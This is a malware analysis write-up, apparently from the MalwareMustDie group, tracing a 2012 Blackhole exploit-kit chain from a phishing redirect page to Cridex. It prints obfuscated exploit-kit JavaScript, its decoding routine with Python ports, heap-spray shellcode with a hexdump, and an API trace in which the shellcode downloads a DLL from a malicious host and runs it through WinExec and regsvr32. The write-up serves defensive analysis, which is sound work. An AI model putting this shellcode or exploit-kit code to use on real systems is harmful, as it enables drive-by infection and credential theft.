MalwareMustDie

#malwareMustDie - BHEK decodeGUIDE (payload: Cridex/Parfeit)

Dec 22nd, 2012
# MalwareMustDie - PluginDetect Decoding Guide
# for the Trojan parfeit Investigation
# (Credential Stealer Case)
------------

--18:06:57--  h00p://www.irwra.com/wp-content/themes/mantra/uploads/cpa_inform.htm
           => `cpa_inform.htm'
Resolving www.irwra.com... 50.116.98.44
Connecting to www.irwra.com|50.116.98.44|:80... connected.
HTTP request sent, awaiting response... HTTP/1.1 200 OK

// real time with Xurl..

@unixfreaxjp /malware]$ Xurl h00p://www.irwra.com/wp-content/themes/mantra/uploads/cpa_inform.html |jless
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   813  100   813    0     0   1187      0 --:--:-- --:--:-- --:--:--  4567
<html>
<head>
<title>Processing request... Banking, Credit Cards, Lending & Investing - CPA</title>

<script type="text/javascript">
<!--
location.replace("h00p://latticesoft.net/detects/continues-little.php");
//-->
</script>
<noscript>
<meta http-equiv="refresh" content="0; url=h00p://latticesoft.net/detects/continues-little.php">
</noscript>

</head>

<h1>You will be redirected to details of purchase</h1>


<h4 style="color:#364dbc;">We must complete few security checks to show your transfer details:</h4>

<h3>Be sure you have a transfer reference ID.<br />You will be asked to enter it after we check the link.<br><br>Important: Please be advised that calls to and from your wire service team may be monitored or recorded.<br /></h3>

<h3>Redirecting to Survey details... Please wait...</h3>



</html>

------------------------------------------------

--2012-12-22 03:44:27--  h00p://latticesoft.net/detects/continues-little.php
Resolving latticesoft.net (latticesoft.net)... 59.57.247.185
Caching latticesoft.net => 59.57.247.185
Connecting to latticesoft.net (latticesoft.net)|59.57.247.185|:80... connected.

---request begin---
GET /detects/continues-little.php HTTP/1.1
Referer: http://www.irwra.com//wp-content/themes/mantra/uploads/cpa_inform.html
User-Agent: #MalwareMustDie!
Accept: */*
Host: latticesoft.net
Connection: Keep-Alive
HTTP request sent, awaiting response...

---response begin---
HTTP/1.1 200 OK
Server: nginx/1.3.3
Date: Fri, 21 Dec 2012 18:44:29 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.3.14
200 OK
Length: unspecified [text/html]
Saving to: `continues-little.php'
2012-12-22 03:44:33 (28.7 KB/s) - `continues-little.php' saved [95903]

--------------------------------------------------------

TRY TWO:

--14:18:07--  h00p://latticesoft.net/detects/continues-little.php
          => `continues-little.php.1'
Resolving latticesoft.net... seconds 0.00, 59.57.247.185
Caching latticesoft.net => 59.57.247.185
Connecting to latticesoft.net|59.57.247.185|:80... seconds 0.00, connected.
Created socket 1896.
Releasing 0x003d5348 (new refcount 1).
---request begin---
GET /detects/continues-little.php HTTP/1.0
Referer: h00p://www.irwra.com//wp-content/themes/mantra/uploads/cpa_inform.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6)
Accept: */*
Host: latticesoft.net
Connection: Keep-Alive

---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Server: nginx/1.3.3
Date: Sat, 22 Dec 2012 05:17:56 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.14

---response end---
200 OK
Length: unspecified [text/html]
14:18:13 (25.29 KB/s) - `continues-little.php.1' saved [91337]  <=============== the size changes....

---------------
// CHANGES!!!!!! Why? What?
// what had changed??
// let's use unix's diff command to diff the previous code w/ the new one and see what changes the moronz did:

0x001c1

< <html><head><title></title></head><body>
<applet archive="/detects/continues-little.php?zasyymcc=vwg&ncnjr=qjx" code="&#00104;&#00119;">
<param value="Dyy3Ojj-Vyy8%eit.ywoeyjMeye%yi" name="&#00118;&#0097;&#00108;"/>
<param value="j%toy8oKeim-8yy-ew3D3xe.b1fO6oO68O68O11R8eb6oOh_O68O6CO6tO68O6AOhvO60O60RMb6.RC3bvRl?bS" name="&#00112;&#00114;&#00105;&#00109;&#00101;" />
</applet><div></div><script>dd="i";pp="e"+"In";asd=function(){for(i=0;;i++){


0x007c7

< <script>a.setAttribute("z5","-2f666eb-46996eb-671g4fc-6bkg4
2e5907a-8h8h8dg-671dmf3-3e5dgf9-1g7ff66-4698heh-3e866e8-871eh
6696969-0h88hfl-4e5g4g7-7flf955-5djh8h8-56iebe5-3g4c6e5-4flg1
3f98heh-1e866e8-171ebe5-6g4c6e5-9flg1eh-3fcf99l-0fcf9e5-15890
271g1ff-1f3ehg4-0b5g7f6-7bhe5eb-9gg6idg-671ebe5-2g4c6e5-1flg1
7e56669-2h8h86i-2dge2e2-6c9ehf9-6a1gae5-2f9g48e-9e8g7f9-9dmg4
7g4dgdm-2eea1ga-0e5f9g4-2665bfc-3f95b6f-8e26idm-269h8e5-4f3g1
8e8g7f9-7dmg177-68ecld4-96ic9am-2e8g7f9-8dmg18e-8cld46i-3flg7
-8e5f9g4-26idg90-6e271eb-7e5g4a1-3f3e5f6-1e5f9g4-0g19fgj-9c0d
-5e5f9g4-1g19fgj-9c0dgeb-8b5dgf6-3e5665b-0djfce2-2gj5b69-6cl7
-16iff6i-0fc90f6-171dmfl-1e5dgg4-1e5a1f3-4e5f6e5-6f9g466-85bg
-7f9e56l-2g1g4gj-7f3e58e-6f9fcf9-5e58hdj-5fcfle2-5e5fl6l-8g1g
-8dgg1e5-4666971-0fle5ff-7f3dgdm-0e56674-6d1g174-4eb6i5b-45b6

0x018c18

<   if(a["su"+"bstr"](i,1)=="-")i+=2;
---
>   if(a["substr"](i,1)=="-")i+=2;

// yep, the moronz was changing the jar applet infector (0x001c1) &
// it changed the obfuscation code (0x007c7) and also -
// made the strings in the obfs generator code more scattered (0x018c18)

// These three changes suggest the payload has changed.
// Never mind the old payload, let's get into the new one!

--------------------------------------------------------

// See the latest code...

// let's strip the garbage html code & make it more viewable..
// then see which parts belong to the obfuscation & its structure,
// and recognize where the obfuscated data feed code & the decoding generator code are.

// After that go to the obfuscation part and understand the structure < important!
// In this case the malware moronz are splitting the obfuscation code across a.setAttribute()
// arrays using script tags; just adjust them by deleting all <script></script>
// tags and you're good to go.

// So, the structure of the current obfuscated code is:

a.setAttribute("z0","-[0-9|a-z]...-[0-9|a-z]");
               z0+1
               :
               z29

// And this is the code that feeds the obfuscated data...

dd="i";                  // tag name of the element that carries the data: <i>
pp="e"+"In";             // not used in the code shown here

asd=function()           // join the z0, z1, z2, ... attributes of a until one is missing
  {
  for(i=0;;i++)
      {
      r=a.getAttribute("z"+i);if(r){s=s+r;}else break;
      }};
a=document.createElement(dd);


// Thus, this is the generator part to crack the code;

document.body.appendChild(a);
if(document.getElementsByTagName("d"+"iv")[0].style.left==="")   // only runs when a real <div> with a real style object exists
{
  ss=String.fromCharCode;
  a=document["getElementsB"+"yTagName"](dd);   // the <i> element(s) holding the z0..z29 attributes
  a=a[0];
  s=new String();
  asd();                    // s now holds all chunks concatenated
  a=s;
  s=new String();
  e=window["eva"+"l"];      // eval, split to dodge simple string matching
  p=parseInt;
  for(i=0;a.length>i;i+=2)
  {
    if(a["su"+"bstr"](i,1)=="-")i+=2;             // '-' and the one filler char after it are skipped
    s=s+(ss((p(a["substr"](i,2),23)-24)/3));      // two base-23 digits -> one character
  }
  try
  {
    document.body*=document;   // nonsense assignment that throws in a browser, so execution lands in catch
  }
  catch(asfas)
  {
    e("if(1)"+s);              // run the decoded PluginDetect code
  }
}


// And this is the logic formula to crack :

  // here's the formula...
  for(i=0;a.length>i;i+=2)
  {
    if(a["substr"](i,1)=="-")i+=2;
    s=s+(ss((p(a["substr"](i,2),23)-24)/3));
  }


// You can reproduce the decoding operation easily by making an
// array for element a, feeding entries 0 to 29 with the
// garbled chunks one by one, and passing the joined result into the
// formula.
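
// The decoding routine above, ported to Python as an added worked example (this is not
// code from the original post or from the exploit kit). It gathers the zN attributes the
// way asd() does, applies the base-23 formula, and, because the kit's encoder is not on
// the page, includes a constructed inverse encoder plus a constructed HTML stand-in as
// test input; the sample payload, the "-X" filler layout and the chunk width are assumptions.

```python
import re

# Base-23 digit alphabet, the same set parseInt(x, 23) accepts (lowercase form).
DIGITS = "0123456789abcdefghijklm"

def decode_chunk(a):
    """Port of the page's loop:
         for(i=0;a.length>i;i+=2){ if(a.substr(i,1)=="-")i+=2;
                                   s=s+ss((p(a.substr(i,2),23)-24)/3); }
    A '-' starts a filler group: the dash and the one character after it are skipped,
    then every two base-23 digits yield one character of the hidden script."""
    out = []
    i = 0
    while i < len(a):
        if a[i] == "-":
            i += 2                      # skip '-' and its filler character
        pair = a[i:i + 2]
        if len(pair) < 2:
            break                       # nothing left to decode
        out.append(chr((int(pair, 23) - 24) // 3))
        i += 2
    return "".join(out)

ATTR_RE = re.compile(r'a\.setAttribute\("z(\d+)",\s*"([^"]*)"\)')

def collect_chunks(html):
    """Does what asd() does: join z0, z1, z2, ... in numeric order and stop at the first
    gap, no matter how many <script> tags the setAttribute calls are spread over."""
    found = {int(n): data for n, data in ATTR_RE.findall(html)}
    parts = []
    i = 0
    while i in found:
        parts.append(found[i])
        i += 1
    return "".join(parts)

def decode_page(html):
    return decode_chunk(collect_chunks(html))

def encode(text, group=3, seed=7):
    """Inverse of the formula, written here only to build test data (assumption: the kit's
    own encoder is not on the page). Pairs are emitted in groups of `group`, each group
    prefixed by '-' and one filler digit, mimicking the "-Xaabbcc" layout of the z5 data."""
    pairs = []
    for ch in text:
        v = 3 * ord(ch) + 24            # undo the (v - 24) / 3 step
        pairs.append(DIGITS[v // 23] + DIGITS[v % 23])
    out = []
    for k in range(0, len(pairs), group):
        out.append("-" + DIGITS[(seed + k) % 10] + "".join(pairs[k:k + group]))
    return "".join(out)

def build_sample_page(payload, width=24):
    """Constructed stand-in for the kit's HTML: the encoded payload is split across
    a.setAttribute("zN", ...) calls, each inside its own <script> tag."""
    enc = encode(payload)
    parts = [enc[k:k + width] for k in range(0, len(enc), width)]
    scripts = "".join('<script>a.setAttribute("z%d","%s");</script>\n' % (n, p)
                      for n, p in enumerate(parts))
    return "<html><body>" + scripts + "</body></html>"

# Constructed sample payload (a stub of the PluginDetect header, not the real script).
SAMPLE_PAYLOAD = 'var PluginDetect = { version : "0.7.9", name : "PluginDetect" };'

if __name__ == "__main__":
    page = build_sample_page(SAMPLE_PAYLOAD)
    print(collect_chunks(page)[:64] + "...")
    print(decode_page(page))
```

// Feeding decode_chunk() the first group of the z5 data shown in the diff ("-2f666eb")
// gives "m(g", which is what the browser-side loop produces for the same input.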


//And the result is the NEW PLUGINDETECT OBFS code (v 0.7.9)

var PluginDetect =
{
  version : "0.7.9", name : "PluginDetect", handler : function (c, b, a)
  {
    return function ()
    {
      c(b, a)
    }
  }
  , openTag : "<", isDefined : function (b)
  {
    return typeof b != "undefined"
  }
  , isArray : function (b)
  {
    return (/array/i).test(Object.prototype.toString.call(b))
       :
       :(blah! etc)

//let's modify shellcode to grab the payload:

var a = "8282!%51c4!%04e4!%25e0!%f551!%e014!%9134!%4451!%54e0!%2191!%9154!%e521!%21a1!%91f4!%1421!%2191!%9174!%2421!%2191!%9114!%f521!%21a1!%9164!%d451!%e0f4!%b181!%2421!%2191!%91e4!%e521!%21a1!%b181!%e451!%7125!%0485!%6085!%44d4!%c5c5!%4414!%b550!%d5d4!%1464!%64c5!%b474!%b570!%b4c5!%c5d4!%c4d4!%c570!%64d4!%c560!%74e4!%d4b5!%14b4!%c5c5!%4494!%7070!%8521!%c5c5!%8504!%2370!%15e1!%eee6!%3733!%2e2a!%59b1!%7492!%621a!%6d2a!%4c0b!%6662!%7d6a!%6d7d!%0c4b!%e702!%6d7d!%8224!%ce24!%82d5!%8a71!%2df6!%82d5!%8a71!%b3f6!%a23c!%423c!%babe!%e7c2!%b77d!%3c42!%82ba!%c224!%7de7!%82b7!%e324!%8ed5!%c3da!%7de7!%2482!%b7f7!%2482!%2482!%9697!%53c2!%0ac6!%c281!%2a9e!%8217!%5312!%eec6!%4444!%60c4!%53d2!%fec6!%a4c5!%f585!%5382!%fec6!%1e97!%0cb1!%423a!%7de7!%8282!%0d82!%b704!%b580!%8050!%c002!%fec6!%b1a1!%e5a5!%c0c2!%fec6!%f4b5!%a5d4!%c2c0!%42fe!%47c0!%825a!%9282!%4cc2!%a59a!%a23c!%7d3c!%7d7d!%0c94!%3a0c!%ce02!%e3ba!%c77d!%4454!%d5a5!%8204!%6482!%0474!%7dbc!%bed2!%83ba!%3a67!%3a4c!%87d7!%8e13!%87ba!%8282!%7d82!%8604!%8724!%8207!%8282!%0c82!%ac1d!%7d7d!%0b7d!%170c!%24d2!%3afd!%0402!%bd3a!%eb3c!%c5b2!%42b1!%8a55!%0480!%583a!%3cb7!%17be!%3867!%b2de!%c23a!%5f3a!%0fb2!%423a!%c7c0!%4c7d!%5ae6!%4236!%e43a!%b25f!%67c0!%673a!%d5ec!%3173!%3c9d!%2f86!%52b2!%9e3e!%c502!%01ad!%6983!%3f72!%deb1!%58b2!%964d!%1e16!%ddb1!%80b2!%3ae5!%dde7!%05b2!%c5d1!%413a!%3ad5!%97e7!%3c46!%971c!%ccd5!%c0da!%fac1!%d53d!%11e2!%bee6!%8681!%093a!%7d7d!%d383!%9a6c!%b140!%b2c5!%6741!%e43a!%b13f!%e502!%e73a!%8543!%423a!%3a86!%8681!%c43a!%b18e!%1c77!%d5c1!%dacc!%ffff!%beff!%508e!%afbe!%042e!%0382!%ef08!%9e80!%6618!%139c!%0185!%cfbe!%4ecf!%6638!%1414!%1414!%1414!%".split("").reverse().join("");
var x=a["replace"](/\%!/g, "%" + "u");
document.write(x);

↓↓

%u4141%u4141%u8366%ufce4%uebfc%u5810%uc931%u8166%u08e9%u80fe%u2830%ue240%uebfa%ue805%uffeb%uffff%uccad%u1c5d%u77c1%ue81b%ua34c%u1868%u68a3%ua324%u3458%ua37e%u205e%uf31b%ua34e%u1476%u5c2b%u041b%uc6a9%u383d%ud7d7%ua390%u1868%u6eeb%u2e11%ud35d%u1caf%uad0c%u5dcc%uc179%u64c3%u7e79%u5da3%ua314%u1d5c%u2b50%u7edd%u5ea3%u2b08%u1bdd%u61e1%ud469%u2b85%u1bed%u27f3%u3896%uda10%u205c%ue3e9%u2b25%u68f2%ud9c3%u3713%uce5d%ua376%u0c76%uf52b%ua34e%u6324%u6ea5%ud7c4%u0c7c%ua324%u2bf0%ua3f5%ua32c%ued2b%u7683%ueb71%u7bc3%ua385%u0840%u55a8%u1b24%u2b5c%uc3be%ua3db%u2040%udfa3%u2d42%uc071%ud7b0%ud7d7%ud1ca%u28c0%u2828%u7028%u4278%u4068%u28d7%u2828%uab78%u31e8%u7d78%uc4a3%u76a3%uab38%u2deb%ucbd7%u4740%u2846%u4028%u5a5d%u4544%ud77c%uab3e%u20ec%uc0a3%u49c0%ud7d7%uc3d7%uc32a%ua95a%u2cc4%u2829%ua528%u0c74%uef24%u0c2c%u4d5a%u5b4f%u6cef%u2c0c%u5a5e%u1a1b%u6cef%u200c%u0508%u085b%u407b%u28d0%u2828%u7ed7%ua324%u1bc0%u79e1%u6cef%u2835%u585f%u5c4a%u6cef%u2d35%u4c06%u4444%u6cee%u2135%u7128%ue9a2%u182c%u6ca0%u2c35%u7969%u2842%u2842%u7f7b%u2842%u7ed7%uad3c%u5de8%u423e%u7b28%u7ed7%u422c%uab28%u24c3%ud77b%u2c7e%uebab%uc324%uc32a%u6f3b%u17a8%u5d28%u6fd2%u17a8%u5d28%u42ec%u4228%ud7d6%u207e%ub4c0%ud7d6%ua6d7%u2666%ub0c4%ua2d6%ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e51%u0732%u4058%u5c5c%u1258%u0707%u4944%u5c5c%u4b41%u5b4d%u4e47%u065c%u4d46%u075c%u4d4c%u4d5c%u5c4b%u075b%u474b%u5c46%u4641%u4d5d%u055b%u4144%u5c5c%u4d44%u5806%u5840%u5217%u154e%u181b%u1a12%u125e%u4e19%u1912%u1242%u181b%u4f0e%u154d%u4619%u1a12%u125f%u4119%u1912%u1242%u4719%u1912%u1241%u4f19%u1a12%u125e%u4519%u1912%u0e45%u1544%u4319%u410e%u155f%u0e52%u4e40%u4c15%u2828


// here's the shellcode (in bin & text)....

41 41 41 41 66 83 e4 fc  fc eb 10 58 31 c9 66 81   AAAAf......X1.f.
e9 08 fe 80 30 28 40 e2  fa eb 05 e8 eb ff ff ff   ....0(@.........
ad cc 5d 1c c1 77 1b e8  4c a3 68 18 a3 68 24 a3   ..]..w..L.h..h$.
58 34 7e a3 5e 20 1b f3  4e a3 76 14 2b 5c 1b 04   X4~.^...N.v.+\..
a9 c6 3d 38 d7 d7 90 a3  68 18 eb 6e 11 2e 5d d3   ..=8....h..n..].
af 1c 0c ad cc 5d 79 c1  c3 64 79 7e a3 5d 14 a3   .....]y..dy~.]..
5c 1d 50 2b dd 7e a3 5e  08 2b dd 1b e1 61 69 d4   \.P+.~.^.+...ai.
85 2b ed 1b f3 27 96 38  10 da 5c 20 e9 e3 25 2b   .+...'.8..\...%+
f2 68 c3 d9 13 37 5d ce  76 a3 76 0c 2b f5 4e a3   .h...7].v.v.+.N.
24 63 a5 6e c4 d7 7c 0c  24 a3 f0 2b f5 a3 2c a3   $c.n..|.$..+..,.
2b ed 83 76 71 eb c3 7b  85 a3 40 08 a8 55 24 1b   +..vq..{..@..U$.
5c 2b be c3 db a3 40 20  a3 df 42 2d 71 c0 b0 d7   \+....@...B-q...
d7 d7 ca d1 c0 28 28 28  28 70 78 42 68 40 d7 28   .....((((pxBh@.(
28 28 78 ab e8 31 78 7d  a3 c4 a3 76 38 ab eb 2d   ((x..1x}...v8..-
d7 cb 40 47 46 28 28 40  5d 5a 44 45 7c d7 3e ab   ..@GF((@]ZDE|.>.
ec 20 a3 c0 c0 49 d7 d7  d7 c3 2a c3 5a a9 c4 2c   .....I....*.Z..,
29 28 28 a5 74 0c 24 ef  2c 0c 5a 4d 4f 5b ef 6c   )((.t.$.,.ZMO[.l
0c 2c 5e 5a 1b 1a ef 6c  0c 20 08 05 5b 08 7b 40   .,^Z...l....[.{@
d0 28 28 28 d7 7e 24 a3  c0 1b e1 79 ef 6c 35 28   .(((.~$....y.l5(
5f 58 4a 5c ef 6c 35 2d  06 4c 44 44 ee 6c 35 21   _XJ\.l5-.LDD.l5!
28 71 a2 e9 2c 18 a0 6c  35 2c 69 79 42 28 42 28   (q..,..l5,iyB(B(
7b 7f 42 28 d7 7e 3c ad  e8 5d 3e 42 28 7b d7 7e   {.B(.~<..]>B({.~
2c 42 28 ab c3 24 7b d7  7e 2c ab eb 24 c3 2a c3   ,B(..${.~,..$.*.
3b 6f a8 17 28 5d d2 6f  a8 17 28 5d ec 42 28 42   ;o..(].o..(].B(B
d6 d7 7e 20 c0 b4 d6 d7  d7 a6 66 26 c4 b0 d6 a2   ..~.......f&....
26 a1 47 29 95 1b e2 a2  73 33 ee 6e 51 1e 32 07   &.G)....s3.nQ.2.
58 40 5c 5c 58 12 07 07  44 49 5c 5c 41 4b 4d 5b   X@\\X...DI\\AKM[
47 4e 5c 06 46 4d 5c 07  4c 4d 5c 4d 4b 5c 5b 07   GN\.FM\.LM\MK\[.
4b 47 46 5c 41 46 5d 4d  5b 05 44 41 5c 5c 44 4d   KGF\AF]M[.DA\\DM
06 58 40 58 17 52 4e 15  1b 18 12 1a 5e 12 19 4e   .X@X.RN.....^..N
12 19 42 12 1b 18 0e 4f  4d 15 19 46 12 1a 5f 12   ..B....OM..F.._.
19 41 12 19 42 12 19 47  12 19 41 12 19 4f 12 1a   .A..B..G..A..O..
5e 12 19 45 12 19 45 0e  44 15 19 43 0e 41 5f 15   ^..E..E.D..C.A_.
52 0e 40 4e 15 4c 28 28                            R.@N.L((
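
// The reverse-and-replace step plus the %u-to-bytes conversion behind the dump above, as an
// added Python example (not code from the original post). The only assumption is the one the
// page's own hexdump confirms: each %uXXXX unit lands in memory little-endian (%u8366 -> 66 83).
// The stored sample string is constructed from the first four words of the page's shellcode.

```python
import re
import struct

# Constructed sample: the stored (reversed, "%!"-encoded) form of the first four
# words of the page's shellcode, %u4141%u4141%u8366%ufce4.
STORED_SAMPLE = "4ecf!%6638!%1414!%1414!%"

def rebuild_escape_string(stored):
    """Same two steps as the page's JS: .split("").reverse().join("") followed by
    replace(/%!/g, "%u")."""
    return stored[::-1].replace("%!", "%u")

def unicode_escapes_to_bytes(s):
    """Convert a run of %uXXXX escapes into the bytes they occupy once unescaped:
    every 16-bit unit is laid out little-endian, which is why the page's hexdump
    starts 41 41 41 41 66 83 e4 fc for %u4141%u4141%u8366%ufce4."""
    units = re.findall(r"%u([0-9a-fA-F]{4})", s)
    if len(units) * 6 != len(s):
        raise ValueError("not a pure run of %uXXXX escapes")
    return b"".join(struct.pack("<H", int(u, 16)) for u in units)

def hexdump(data, width=16):
    """Hex + ASCII listing in the same layout as the dump on the page."""
    lines = []
    for off in range(0, len(data), width):
        chunk = data[off:off + width]
        hexpart = " ".join("%02x" % b for b in chunk)
        text = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append("%-*s  %s" % (width * 3 - 1, hexpart, text))
    return "\n".join(lines)

if __name__ == "__main__":
    escaped = rebuild_escape_string(STORED_SAMPLE)
    print(escaped)
    print(hexdump(unicode_escapes_to_bytes(escaped)))
```

// Paste the full stored string from the page into STORED_SAMPLE and the listing matches the
// "bin & text" dump above byte for byte; the bytes can then go straight into an emulator for
// the API trace that follows.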

// And the translation of the API.....

0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)
0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=http://latticesoft.net/detects/continues-little.php?zf=30:2v:1f:1j:30&ge=1n:2w:1i:1j:1o:1i:1g:2v:1m:1m&l=1k&iw=z&hf=d , lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)

----
#MalwareMustDie!
unixfreaxjp /malware]$ date
Sat Dec 22 18:59:02 JST 2012